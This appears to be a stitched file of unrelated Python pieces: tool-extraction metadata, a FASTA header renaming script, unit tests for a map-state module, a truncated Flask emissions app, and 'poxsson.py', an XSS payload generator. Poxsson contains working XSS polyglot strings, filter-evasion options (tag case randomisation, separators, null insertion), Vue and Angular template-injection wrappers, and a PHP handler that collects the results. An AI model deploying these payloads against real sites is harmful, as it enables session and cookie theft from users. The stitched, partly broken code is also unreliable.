] | [((961, 983), 'torch.nn.ModuleList', 'nn.ModuleList', (['modules'], {}), '(modules)\n', (974, 983), True, 'import torch.nn as nn\n'), ((6404, 6656), 'torch.nn.functional.batch_norm', 'F.batch_norm', (['input', '(self.running_mean if not self.training or self.track_running_stats else None)', '(self.running_var if not self.training or self.track_running_stats else None)', 'weight', 'bias', 'bn_training', 'exponential_average_factor', 'self.eps'], {}), '(input, self.running_mean if not self.training or self.\n track_running_stats else None, self.running_var if not self.training or\n self.track_running_stats else None, weight, bias, bn_training,\n exponential_average_factor, self.eps)\n', (6416, 6656), True, 'from torch.nn import functional as F\n'), ((10709, 10794), 'torch.nn.functional.conv2d', 'F.conv2d', (['x', 'weight', 'bias', 'self.stride', 'self.padding', 'self.dilation', 'self.groups'], {}), '(x, weight, bias, self.stride, self.padding, self.dilation, self.groups\n )\n', (10717, 10794), True, 'from torch.nn import functional as F\n'), ((14032, 14057), 'torch.nn.functional.linear', 'F.linear', (['x', 'weight', 'bias'], {}), '(x, weight, bias)\n', (14040, 14057), True, 'from torch.nn import functional as F\n'), ((845, 874), 'numpy.ceil', 'np.ceil', (['(r * max_num_features)'], {}), '(r * max_num_features)\n', (852, 874), True, 'import numpy as np\n'), ((4137, 4175), 'numpy.ceil', 'np.ceil', (['(self.max_num_features * ratio)'], {}), '(self.max_num_features * ratio)\n', (4144, 4175), True, 'import numpy as np\n'), ((9843, 9880), 'numpy.ceil', 'np.ceil', (['(self.max_in_channels * ratio)'], {}), '(self.max_in_channels * ratio)\n', (9850, 9880), True, 'import numpy as np\n'), ((9980, 10018), 'numpy.ceil', 'np.ceil', (['(self.max_out_channels * ratio)'], {}), '(self.max_out_channels * ratio)\n', (9987, 10018), True, 'import numpy as np\n'), ((13164, 13201), 'numpy.ceil', 'np.ceil', (['(self.max_in_features * ratio)'], {}), '(self.max_in_features * ratio)\n', (13171, 13201), True, 'import numpy as np\n'), ((13301, 13339), 'numpy.ceil', 'np.ceil', (['(self.max_out_features * ratio)'], {}), '(self.max_out_features * ratio)\n', (13308, 13339), True, 'import numpy as np\n')] |
"""
renameHeaders.py
Created by <NAME>
Before a hybrid index can be created from hg19_random.fa and
mm10.fa, the headers must be changed so that they are reference-specific.
This is important during the alignment process, as the name of the chromosome to which
each read aligns is included in the SAM format for that read. The only way to
distinguish if the read aligned to i.e. chr1 on mouse or chr1 on human is by the
reference name in the chromosome tag.
"""
import re
import sys
out_file = open('hg19_random_tagged.fa', 'w')
with open(sys.argv[1], 'r') as in_file:
for line in in_file:
if line.strip():
chr_name = re.findall('>chr[0-9]*', line, flags=0)
if len(chr_name) > 0:
chr_name = chr_name + '_hg19'
out_file.write("{:s}\n".format(chr_name))
continue
out_file.write("{:s}\n".format(line))
| [
"re.findall"
] | [((629, 668), 're.findall', 're.findall', (['""">chr[0-9]*"""', 'line'], {'flags': '(0)'}), "('>chr[0-9]*', line, flags=0)\n", (639, 668), False, 'import re\n')] |
import unittest
from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator
from rapidmaps.map.selection import Selections
from rapidmaps.map.shape import Point
import wx
class MyTestCase(unittest.TestCase):
def test_map_sate_type(self):
self.assertEqual(MapStateType.contains(MapStateType.UNKNOWN), True)
self.assertEqual(MapStateType.contains('WRONG'), False)
self.assertEqual(MapStateType.get_default(MapStateType.MOUSE_LEFT_POS),
MapStateType.MOUSE_LEFT_POS)
self.assertEqual(MapStateType.get_default('WRONG'),
MapStateType.UNKNOWN)
def test_maps_state_entity(self):
state = MapStateEntity(MapStateType.UNKNOWN, 2)
self.assertNotEqual(state, None)
self.assertEqual(state.value, 2)
self.assertEqual(state.last_value, None)
state.value = 4
self.assertEqual(state.value, 4)
self.assertEqual(state.last_value, 2)
state2 = MapStateEntity(MapStateType.MOUSE_LEFT_POS, (100, 100), (0, 0))
self.assertEqual(state2.type, MapStateType.MOUSE_LEFT_POS)
self.assertEqual(state2.is_type(MapStateType.MOUSE_LEFT_POS), True)
self.assertNotEqual(state2.type, MapStateType.UNKNOWN)
self.assertEqual(state2.is_type(MapStateType.UNKNOWN), False)
self.assertEqual(state2.is_type(None), False)
def test_map_state(self):
ms = MapState()
self.assertEqual(ms.get('Wrong'), None)
self.assertEqual(ms.get(0), None)
ms.set(MapStateType.MOUSE_LEFT_POS, (1, 1))
me = ms.get(MapStateType.MOUSE_LEFT_POS)
self.assertEqual(me.type, MapStateType.MOUSE_LEFT_POS)
self.assertEqual(me.is_type(MapStateType.MOUSE_LEFT_POS), True)
self.assertEqual(me.value, (1, 1))
self.assertNotEqual(me.value, (1, 2))
def test_map_state_translator(self):
ms = MapState()
sel = Selections()
mst = MapStateTranslator(ms, sel)
self.assertRaises(ValueError, MapStateTranslator, None, None)
self.assertRaises(ValueError, MapStateTranslator, "Wrong", "bla")
def test_mst_selection_was_moved(self):
ms = MapState()
sel = Selections()
mst = MapStateTranslator(ms, sel)
sel.add(Point())
ms.set(MapStateType.MOUSE_POS, wx.Point(0, 0))
ms.set(MapStateType.MOUSE_POS, wx.Point(1, 1))
ms.set(MapStateType.MOUSE_LEFT, True)
ms.set(MapStateType.MOUSE_LEFT, False)
self.assertEqual(mst.selection_was_moved, True)
sel.clear()
self.assertEqual(mst.selection_was_moved, False)
if __name__ == '__main__':
unittest.main()
| [
"rapidmaps.map.state.MapStateType.contains",
"rapidmaps.map.selection.Selections",
"rapidmaps.map.state.MapState",
"rapidmaps.map.state.MapStateTranslator",
"rapidmaps.map.state.MapStateEntity",
"rapidmaps.map.state.MapStateType.get_default",
"unittest.main",
"wx.Point",
"rapidmaps.map.shape.Point"
... | [((2689, 2704), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2702, 2704), False, 'import unittest\n'), ((713, 752), 'rapidmaps.map.state.MapStateEntity', 'MapStateEntity', (['MapStateType.UNKNOWN', '(2)'], {}), '(MapStateType.UNKNOWN, 2)\n', (727, 752), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((1012, 1075), 'rapidmaps.map.state.MapStateEntity', 'MapStateEntity', (['MapStateType.MOUSE_LEFT_POS', '(100, 100)', '(0, 0)'], {}), '(MapStateType.MOUSE_LEFT_POS, (100, 100), (0, 0))\n', (1026, 1075), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((1451, 1461), 'rapidmaps.map.state.MapState', 'MapState', ([], {}), '()\n', (1459, 1461), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((1933, 1943), 'rapidmaps.map.state.MapState', 'MapState', ([], {}), '()\n', (1941, 1943), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((1958, 1970), 'rapidmaps.map.selection.Selections', 'Selections', ([], {}), '()\n', (1968, 1970), False, 'from rapidmaps.map.selection import Selections\n'), ((1985, 2012), 'rapidmaps.map.state.MapStateTranslator', 'MapStateTranslator', (['ms', 'sel'], {}), '(ms, sel)\n', (2003, 2012), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((2215, 2225), 'rapidmaps.map.state.MapState', 'MapState', ([], {}), '()\n', (2223, 2225), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((2240, 2252), 'rapidmaps.map.selection.Selections', 'Selections', ([], {}), '()\n', (2250, 2252), False, 'from rapidmaps.map.selection import Selections\n'), ((2267, 2294), 'rapidmaps.map.state.MapStateTranslator', 'MapStateTranslator', (['ms', 'sel'], {}), '(ms, sel)\n', (2285, 2294), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((302, 345), 'rapidmaps.map.state.MapStateType.contains', 'MapStateType.contains', (['MapStateType.UNKNOWN'], {}), '(MapStateType.UNKNOWN)\n', (323, 345), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((378, 408), 'rapidmaps.map.state.MapStateType.contains', 'MapStateType.contains', (['"""WRONG"""'], {}), "('WRONG')\n", (399, 408), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((442, 495), 'rapidmaps.map.state.MapStateType.get_default', 'MapStateType.get_default', (['MapStateType.MOUSE_LEFT_POS'], {}), '(MapStateType.MOUSE_LEFT_POS)\n', (466, 495), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((576, 609), 'rapidmaps.map.state.MapStateType.get_default', 'MapStateType.get_default', (['"""WRONG"""'], {}), "('WRONG')\n", (600, 609), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((2311, 2318), 'rapidmaps.map.shape.Point', 'Point', ([], {}), '()\n', (2316, 2318), False, 'from rapidmaps.map.shape import Point\n'), ((2359, 2373), 'wx.Point', 'wx.Point', (['(0)', '(0)'], {}), '(0, 0)\n', (2367, 2373), False, 'import wx\n'), ((2414, 2428), 'wx.Point', 'wx.Point', (['(1)', '(1)'], {}), '(1, 1)\n', (2422, 2428), False, 'import wx\n')] |
#!/usr/bin/python3
import argparse
from huepy import *
import sys
import importlib
import os
import base64
import pyperclip
import subprocess
from terminaltables import SingleTable
import random
import socket
#import atexit
POXSSON_PATH = os.path.realpath(__file__).replace("poxsson.py", "") #Absolute path of the project directory
polyglot_triggers = [
["onload","common tags", "0-click"],
["onpageshow","body","Works only without DOM dependency"],
["onfocus","input, select, a", "Use 'autofocus'for 0click"],
["onerror","img, input, object, link, script, video, audio","Specify wrong params to trigger error handling"],
["onanimationstart","CSS element","Fired then a CSS animation starts"],
["onanimationend","CSS element", "Fires when a CSS animation ends"],
["onstart","marquee","Fires on marquee animation start - Firefox only"],
["onfinish","marquee","Fires on marquee animation end - Firefox only"],
["ontoggle","details","Add ‘open’ attribute for 0-click"]
]
polyglots = {
"1" : """javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/TRIGGER=PAYLOAD//>""",
"2" : "\"'--></noscript></noembed></template></title></textarea></style><script><svg TRIGGER=PAYLOAD></script>",
"3" : "'\"--></title></textarea></style></noscript></noembed></template></frameset><svg TRIGGER=PAYLOAD>",
"4" : "\"'>-->*/</noscript></title><script><svg TRIGGER=PAYLOAD></script>" ,
"5" : "\"'--></style></script><svg TRIGGER=PAYLOAD>",
"6" : """%%0ajavascript:`/*\\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html TRIGGER="/**/ PAYLOAD//'">`"""
}
#Obtains local IP for use with handler
def local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def print_banner():
print("")
print("")
print(green("{_______ {__ {__ {__ __ {__ __"))
print(green("{__ {__ {__ {__ {__ {__{__ {__ "))
print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ "))
print(green("{_______ {__ {__ {__ {__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ {__ {__{__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ __ {__ __ {__ {___ {__ "))
print("")
#Function for printing metasploit-like tables ;>
def print_table(table_data):
styles = []
for title in table_data[0]:
msf_style = "-"*len(title)
styles.append(msf_style)
table_data.insert(1, styles)
table_instance = SingleTable(table_data)
table_instance.inner_heading_row_border = False
table_instance.inner_row_border = False
table_instance.inner_column_border = False
table_instance.outer_border = False
table_instance.justify_columns = {0: 'left', 1: 'left', 2: 'left'}
print(table_instance.table)
print('')
#Simply lists files under /payloads dir and prints info about them in color
def list_payloads():
#print(f"\n{logs.red(logs.bold("|"))} PAYLOADS {logs.red(logs.bold("|"))}")
table_data = [["Name", "Description", "Handler", "Length"]]
payloads = []
plds = []
for p in os.walk(POXSSON_PATH+'payloads'):
payloads.append(p)
payloads = payloads[0][2]
for p in payloads:
if ('init' in p or '.pyc' in p):
pass #We don't want temporary files to interfere
else:
if ('.py' in p and not '.pyc' in p):
plds.append(importlib.import_module("payloads."+p.replace(".py", ''))) #Each payload is imported and treated as a module
for pl in plds:
try:
handler = pl.handler
handler = True
except:
handler = False
table_data.append([red(pl.name), blue(pl.description), handler, len(pl.payload)])
print(info(f"Available payloads: {len(plds)}"))
print("")
print_table(table_data)
print("")
polyglot_triggers_data = polyglot_triggers.insert(0, ["Name", "Compatibility", "Description"])
print(info(f"Available triggers: {len(polyglot_triggers)}"))
print("")
print_table(polyglot_triggers)
print("")
print(good(f"Available polyglots: {len(polyglots)}"))
for idn in polyglots:
print(f"[{idn}] -> {polyglots[idn].replace('PAYLOAD', red('PAYLOAD')).replace('TRIGGER', green('TRIGGER'))}")
print("")
#Shows info (options, description, size...) about payload selected with "--payload" flag
def print_payload_info(payload_mod):
payload_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
handler_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
try:
handler = payload_mod.handler
handler = True
except:
handler = False
try:
for opt in payload_mod.options: #Extracts several information from multi-dimensional .options list
option = opt[0]
value = opt[1]
description = opt[2]
payload_options_table_data.append([option, value, description])
except:
pass
try:
for opt in payload_mod.handler_options:
option = opt[0]
value = opt[1]
description = opt[2]
handler_options_table_data.append([option, value, description])
except:
pass
#Prints all obtained data with f"" prefix formatting
print(info(f"Name: {payload_mod.name}"))
print(info(f"Description: {payload_mod.description}"))
print(info(f"Length: {len(payload_mod.payload)} bytes"))
print(info(f"Handler: {handler}"))
if len(payload_options_table_data) > 1:
print("")
info("Payload options:")
print("")
print_table(payload_options_table_data)
if len(handler_options_table_data) > 1:
print("")
info("Handler options:")
print("")
print_table(handler_options_table_data)
#def test_payload(payload_name):
# pass
#I was so high writing this function lol
#But I suppose it just copies a PHP handler to a directory (?)
#And launches it from there using PHP inline interpreter
def start_php_handler(php_code):
#subprocess.call(f"touch {POXSSON_PATH}php_handler_dir/handler.php", shell=True)
with open(f"{POXSSON_PATH}php_handler_dir/handler.php", "w+") as handler_file:
handler_file.write(php_code)
handler_file.close()
subprocess.call(f"php -t {POXSSON_PATH}php_handler_dir -S {local_ip()}:8000", shell=True)
subprocess.call(f"rm -rf {POXSSON_PATH}php_handler_dir", shell=True)
#Inserts default options, and also options passed as NAME=VAL in command line
def insert_options(payload_code, payload_options, cli_options):
pc = payload_code
for option in cli_options:
name = option.split("=")[0].upper()
value = option.split("=")[1]
pc = pc.replace(name.upper(), value)
for option in payload_options:
name = option[0]
value = option[2]
if (value == "" and "=" in ''.join(cli_options)):
print(info(f"{name.upper()} option is empty")) #Warns if you forgot to set something
#if name.upper() not in payload_code:
#logs.err("No such option")
#sys.exit()
if name.lower() not in ''.join(cli_options):
pc = pc.replace(name.upper(), value)
#try:
#except:
return pc
def arguments():
parser = argparse.ArgumentParser(prog="poxsson")
wrapping = parser.add_argument_group()
#wrapping_group = wrapping.add_mutually_exclusive_group()
parser.add_argument('OPTIONS', nargs="*", help="Specify the payload's options") #nargs means that 0 or mor arguments of this type can be passed
parser.add_argument('-l', '--list', action='store_true', dest='LIST_PAYLOADS', help='List available payloads')
parser.add_argument('-p', '--payload', action='store', dest='PAYLOAD', metavar='<payload>', help='Specify the payload')
parser.add_argument('-v', '--verbose', action='store_true', dest='VERBOSE', help='Increase verbosity')
parser.add_argument('-i', '--info', action='store_true', dest='INFO', help='Show payload info')
parser.add_argument('-n', '--null', action='store_true', dest='NULL_INSERT', help='Perform null ("%%00") insertion for evasion')
parser.add_argument('-c', '--clip', action='store_true', dest='CLIP', help='Copy payload to clipboard')
parser.add_argument('-o', '--output', action='store', dest='OUTPUT', metavar='<file>', help='Save payload to a file')
parser.add_argument('-d', '--delay', action='store', dest='DELAY', metavar='<n[s|m|h]>', help='Execute payload after specific period of time (seconds, minutes, hours)')
parser.add_argument('-e', '--encode', action='store', choices=['base64', 'utf8'], dest='ENCODE', metavar='<encoding>', help='Encode payload')
parser.add_argument('-s', '--separator', action='store', choices=['slash', 'newline', 'tab', 'carriage', 'random'], dest='SEPARATOR', metavar='<sep>', help="Use specific (or random) separator between tag and first parameter")
#Separate group for executable wrappers (it just looks more clear imho)
wrapping.add_argument('--random-max', action='store', dest='RANDOM_MAX', help="Maximum length of the random payload")
wrapping.add_argument('--tag', action='store_true', dest='TAG', help="Wrap payload with basic <script> tags")
wrapping.add_argument('--tag-random', action='store_true', dest='TAG_RANDOM', help="Wrap payload with random <script> tags")
wrapping.add_argument('--tag-different', action='store_true', dest='TAG_RANDOM_DIFFERENT', help="When combined with above option, generates different start and end tags")
wrapping.add_argument('--tag-closer', action='store_true', dest='TAG_CLOSER', help="Use '//' instead of '>' for closing tags")
wrapping.add_argument('--polyglot', action='store', dest='POLYGLOT', metavar="<id>", help="Wrap payload with selected or random polyglot wrapper")
wrapping.add_argument('--polyglot-trigger', action='store', dest='POLYGLOT_TRIGGER', help="Wrap payload with polyglot wrapper")
wrapping.add_argument('--cookie', action='store_true', dest='COOKIE', help="Use cookie shortener to reduce payload's size and detection probability")
wrapping.add_argument('--confirm', action='store_true', dest='CONFIRM', help="Replace alert() popups with less detectable confirm()")
wrapping.add_argument('--oneliner', action='store_true', dest='ONELINER', help="Convert generated payload to one-liner")
wrapping.add_argument('--bookmarklet', action='store_true', dest='BOOKMARKLET', help="Convert generated payload to a bookmarklet")
wrapping.add_argument('--handler', action='store_true', dest='HANDLER', help="Start handler after payload generation")
wrapping.add_argument('--replace-http', action='store_true', dest='REPLACE_HTTP', help="Replace 'http[s]://' with a random substitute")
wrapping.add_argument('--jquery', action='store_true', dest='JQUERY', help="Load JQuery before running the payload")
wrapping.add_argument('--v2', action='store_true', dest='VUE_2', help="Embedd payload inside VueJS v2 template source")
wrapping.add_argument('--v3', action='store_true', dest='VUE_3', help="Embedd payload inside VueJS v2 template source")
wrapping.add_argument('--angular', action='store_true', dest='ANGULAR', help="Embedd payload inside AngularJS template source")
#parser.add_argument('--replacei-chars', action='store', choices=['html', 'octal', 'url', 'iso', 'hex', 'numeric'], dest='REPLACE',
# help="Replace all special characters with their equivalents of selected type")
return parser.parse_args()
def main():
res = arguments()
if res.LIST_PAYLOADS:
list_payloads()
sys.exit()
try:
loaded_payload = importlib.import_module(f"payloads.{res.PAYLOAD}") #We try to load our specified payload here
except ImportError:
print(bad("No such payload"))
sys.exit()
js_code = loaded_payload.payload
if res.RANDOM_MAX:
if res.PAYLOAD == "random":
selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
while len(selected_payload) >= int(res.RANDOM_MAX):
selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
if res.PAYLOAD == "confirm":
selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
while len(selected_payload) >= int(res.RANDOM_MAX):
selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
js_code = insert_options(js_code, loaded_payload.options, res.OPTIONS) #Options replacement
if res.DELAY:
time_shorts = {'s':1000, 'm':60000, 'h':3600000}
if type(res.DELAY) == int:
delay_in_miliseconds = int(res.DELAY)
else:
if res.DELAY[-1] not in ['s', 'm', 'h']:
print(err("Wrong delay format"))
sys.exit()
delay_in_miliseconds = int(res.DELAY[0:-1])*time_shorts[res.DELAY[-1]]
js_code = f"""setTimeout(function() {
{js_code}
}, {delay_in_miliseconds})""" #Our payload is embeded inside "setTimeout". The timeout itself is expanded from interval to miliseconds
if res.JQUERY:
js_code = f"""<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js">{js_code}"""
if res.INFO:
print_payload_info(loaded_payload)
sys.exit() #Shows details and exits
if res.ONELINER:
js_code = js_code.replace("\n", "") #Replaces newlines so the payload becomes a one-liner
if res.BOOKMARKLET:
js_code = "javascript:(function(){" + js_code.replace("\n", "") + "})();"
if res.NULL_INSERT:
null_char = "%%00"
payload_len = len(js_code)
start_position = random.randrange(payload_len)
#Not finished yet, but it should insert NULLs on random positions.
if res.REPLACE_HTTP:
substitute = random.choice(["//", "/\\\\", "\\\\"])
js_code = js_code.replace("http://", "//") #Sometimes http[s] can be omitted in payloads
js_code = js_code.replace("https://", "//")
if res.ENCODE:
if res.ENCODE == "base64":
js_code = f"""eval(decode64('{base64.b64encode(js_code.encode("utf-8"))}'))"""
elif res.ENCODE == "utf8":
js_code = js_code.encode("utf-8") #Payload encoders
else:
logs.err("No such encoding")
sys.exit()
if res.POLYGLOT: #Polyglot wrapper makes it easy to exec payload in multiple environments
if res.POLYGLOT == "random":
plg = polyglots[res.POLYGLOT]
else:
plg = random.choice(list(polyglots.values()))
polyglot = plg.replace("PAYLOAD", js_code).replace("TRIGGER", res.POLYGLOT_TRIGGER)
js_code = polyglot
if res.TAG:
js_code_non_tagged = js_code
js_code = f"<script>{js_code}</script>"
if res.COOKIE:
js_code = js_code.replace("document.cookie", "cookie")
js_code_non_tagged = js_code
if res.SEPARATOR:
separators = {
"slash" : "/",
"newline" : "\n",
"tab" : "\t",
"carriage" : '0x3c'
}
def select_separator():
if res.SEPARATOR == "random":
return random.choice(list(separators.values()))
else:
return separators[res.SEPARATOR]
src = bs.find_all(js_code, "html.parser")
for tag in src.find_all():
js_code = js_code.replace(tag.name, tag.name+select_separator())
js_code_non_tagged = js_code
if res.TAG_RANDOM: #Just a tag obfuscation (ex. <script> => <ScRiPt>)
if res.TAG:
js_code = js_code_non_tagged
script_tag = "script"
script_tag = "".join(random.choice([c.upper(), c]) for c in script_tag )
end_tag = script_tag
if res.TAG_RANDOM_DIFFERENT:
end_tag = "".join(random.choice([c.upper(), c]) for c in script_tag )
js_code = f"<{script_tag}>{js_code}</{end_tag}>"
if res.TAG_CLOSER:
js_code = js_code.replace(">", "//")
if res.CONFIRM:
js_code = js_code.replace("alert", "confirm")
if res.VUE_2:
js_code = f"{{constructor.constructor('{js_code}')()}}"
if res.VUE_3:
js_code = f"{{_openBlock.constructor('{js_code}')()}}"
if res.ANGULAR:
js_code = f"{{constructor.constructor('{js_code}')()}}"
if res.CLIP: #Copies payload to system clipboard (can be pasted with Ctrl-V)
pyperclip.copy(js_code)
if res.OUTPUT: #Saves payload to a file
with open(res.OUTPUT, "w+") as payload_file:
payload_file.write(js_code)
if res.VERBOSE:
print(info(f"Saved payload as {res.OUTPUT}"))
print(info(f"Payload length: {len(js_code)}"))
print(good("Generated payload:"))
print("")
print(blue(js_code)) #Prints payload to STDIN in a fancy blue color :>
if res.HANDLER:
try:
#Starts handler and inserts required options (defined inside payload's bodies)
handler_code = loaded_payload.handler
handler_code = insert_options(handler_code, loaded_payload.handler_options, res.OPTIONS)
print(info("Started handler"))
start_php_handler(handler_code)
except AttributeError:
print(err("This module does not have a handler"))
#sys.exit()
#Btw, if you know JS, you can easily write you own, custom payloads.
#Each payload is a separate Python module. Here are possible variables:
# .payload - the actual code of the payload. Upper-case words (ex. CMD, LHOST) are later replaced as options names
# .[handler_]options - two-dimensional, single element list. Option entry looks like this: [<name>, <description>, <default_value>]
# .handler - custom, payload-specific PHP handler.
if __name__ == "__main__":
print_banner()
try:
main()
except KeyboardInterrupt:
print("")
print(info("Exiting"))
| [
"random.choice",
"importlib.import_module",
"argparse.ArgumentParser",
"socket.socket",
"terminaltables.SingleTable",
"random.randrange",
"os.path.realpath",
"pyperclip.copy",
"subprocess.call",
"sys.exit",
"os.walk"
] | [((1741, 1789), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (1754, 1789), False, 'import socket\n'), ((2894, 2917), 'terminaltables.SingleTable', 'SingleTable', (['table_data'], {}), '(table_data)\n', (2905, 2917), False, 'from terminaltables import SingleTable\n'), ((3506, 3540), 'os.walk', 'os.walk', (["(POXSSON_PATH + 'payloads')"], {}), "(POXSSON_PATH + 'payloads')\n", (3513, 3540), False, 'import os\n'), ((6796, 6864), 'subprocess.call', 'subprocess.call', (['f"""rm -rf {POXSSON_PATH}php_handler_dir"""'], {'shell': '(True)'}), "(f'rm -rf {POXSSON_PATH}php_handler_dir', shell=True)\n", (6811, 6864), False, 'import subprocess\n'), ((7717, 7756), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""poxsson"""'}), "(prog='poxsson')\n", (7740, 7756), False, 'import argparse\n'), ((239, 265), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (255, 265), False, 'import os\n'), ((12079, 12089), 'sys.exit', 'sys.exit', ([], {}), '()\n', (12087, 12089), False, 'import sys\n'), ((12124, 12174), 'importlib.import_module', 'importlib.import_module', (['f"""payloads.{res.PAYLOAD}"""'], {}), "(f'payloads.{res.PAYLOAD}')\n", (12147, 12174), False, 'import importlib\n'), ((13846, 13856), 'sys.exit', 'sys.exit', ([], {}), '()\n', (13854, 13856), False, 'import sys\n'), ((14221, 14250), 'random.randrange', 'random.randrange', (['payload_len'], {}), '(payload_len)\n', (14237, 14250), False, 'import random\n'), ((14373, 14411), 'random.choice', 'random.choice', (["['//', '/\\\\\\\\', '\\\\\\\\']"], {}), "(['//', '/\\\\\\\\', '\\\\\\\\'])\n", (14386, 14411), False, 'import random\n'), ((16998, 17021), 'pyperclip.copy', 'pyperclip.copy', (['js_code'], {}), '(js_code)\n', (17012, 17021), False, 'import pyperclip\n'), ((12288, 12298), 'sys.exit', 'sys.exit', ([], {}), '()\n', (12296, 12298), False, 'import sys\n'), ((13340, 13350), 'sys.exit', 'sys.exit', ([], {}), '()\n', (13348, 13350), False, 'import sys\n'), ((14873, 14883), 'sys.exit', 'sys.exit', ([], {}), '()\n', (14881, 14883), False, 'import sys\n')] |
# -*- coding: utf-8 -*-
from flask import Flask
from flask import render_template
from flask import request
from flask import make_response
import pandas as pd
import numpy as np
import csv
import io
app = Flask(__name__)
@app.route("/")
def index():
return render_template("index.html")
DATA = pd.read_csv("Export_Deepki_Ready_dae.csv", sep=",")
GLOBAL_EMISSIONS = [0, 0, ""]
SERVICE_TO_CODE = {
"1": ["Routes", 1000007090],
"2": ["Ports maritimes et littoral", 1000006785],
"3": ["Phares et balises", 1000005715],
"4": ["Prevention des pollutions", 1000005896],
"5": ["Protection de la nature et des paysages", 1000006833],
"6": ["Direction de l'eau", 1000007063],
"7": ["MEEDDAT \(services centraux\)", 1000006798],
"8": ["MEEDDAT \(services sociaux\)", 1000006018],
"9": ["MEEDDM \(services déconcentrés\)", 1000006970],
"10": ["Affaires maritimes \(services déconcentrés\)", 1000006765],
"11": ["Éducation routière \(services déconcentrés\)", 1000006002],
"12": ["DIR - Direct. Interdépart. des Routes", 1000055091],
"13": ["DIRM- Direction interrégionale de la mer -DIRM", 1000005889],
"14": ["DREAL", 1000026692],
"15": ["DEAL", 1000061412],
"16": ["DRIEA IDF", 1000055136],
"17": ["SNOI - Service national des oléoducs interallié", 1000005891],
"18": ["TRAPIL", 1000050607],
"19": ["Culture marine", 1000050192],
"20": ["Domaine remis aux collectivités territ.- Lois de décentralisation", 1000005889],
"21": ["AVIATION CIVILE - Domaine régalien", 1000005888],
"22": ["AVIATION CIVILE - Contrôle et Exploitation Aériens", 1000005907],
"23": ["Chemins de fer", 1000006831],
"24": ["Foncier d'origine routière en Île de France", 1000007093],
"25": ["Aménagement foncier", 1000007060],
"26": ["MINISTERE ECOLOGIE, DEVELOPPEMENT DURABLE, TRANSPORT ET LOGEMENT", 1000025380],
}
@app.route("/export", methods=["GET"])
def export():
if request.method == "GET":
csvlist = GLOBAL_EMISSIONS
si = io.StringIO.StringIO()
cw = csv.writer(si)
cw.writerow(["Electricite", "Gaz", "Batiment"])
cw.writerows(csvlist)
output = make_response(si.getvalue())
output.headers["Content-Disposition"] = "attachment; filename=emissions.csv"
output.headers["Content-type"] = "text/csv"
return output
@app.route("/helper", methods=["GET", "POST"])
def form_example():
if request.method == "POST": # this block is only entered when the form is submitted
service = request.form["services"]
region = request.form["regions"]
emissions_total = calculate_emissions(service, 2019.0, region)
electricite = emissions_total[0]
gaz = emissions_total[1]
# value = u'Les emissions du service %s dans la region %s est gaz: %s electricite: %s' % (service, region, gaz, electricite)
return return_as_html(emissions_total, SERVICE_TO_CODE[service][0], region)
def return_as_html(total, nom, region):
global GLOBAL_EMISSIONS
GLOBAL_EMISSIONS = total
# html = '<head><title>Bilan d\'emissions: '+ nom + '(' + region + ')' + '</title></head>'
html = "<head><title>Bilan d'emission</title><header><h1>Bilan d'emission</h1></header></head>"
html += (
"<body><table><tr><th>Batiment</th><th>Emissions electricite (kgCO2)</th><th>Emissions gaz (kgCO2)</th></tr>"
)
for row in total:
if row[2] == "Total":
html += "<tr><td>" + " " + "</td></tr>"
html += "<tr><td>" + " " + "</td></tr>"
html += "<tr><td>" + " " + "</td></tr>"
html += "<tr><td>" + " " + "</td></tr>"
html += (
'<tr style="font-weight:bold"><td>'
+ row[2]
+ "</td><td>"
+ str(row[0])
+ "</td><td>"
+ str(row[1])
+ "</td></tr>"
)
else:
html += "<tr><td>" + row[2] + "</td><td>" + str(row[0]) + "</td><td>" + str(row[1]) + "</td></tr>"
html += "</table>"
html += '<form action="export" method="GET"><input type="submit" value="Export"></body>'
return html
def get_data_per_building(service, year, region):
if service not in SERVICE_TO_CODE:
return "Le service indiqué n'a pas ete trouve pour ce region."
code = str(SERVICE_TO_CODE[service][1])
return DATA[(DATA["Code bien"].str.contains(code)) & (DATA["Année"] == year) & (DATA["Région"] == region)]
def calculate_emissions(service, year, region):
electricite_emission = 0.0571 # kgCO2e/kWh
gaz_emission = 0.227 # kgCO2e/kWh
data = get_data_per_building(service, year, region)
# print data
if data is None:
return "Les données n'étaient pas trouvé pour ce service dans ce région."
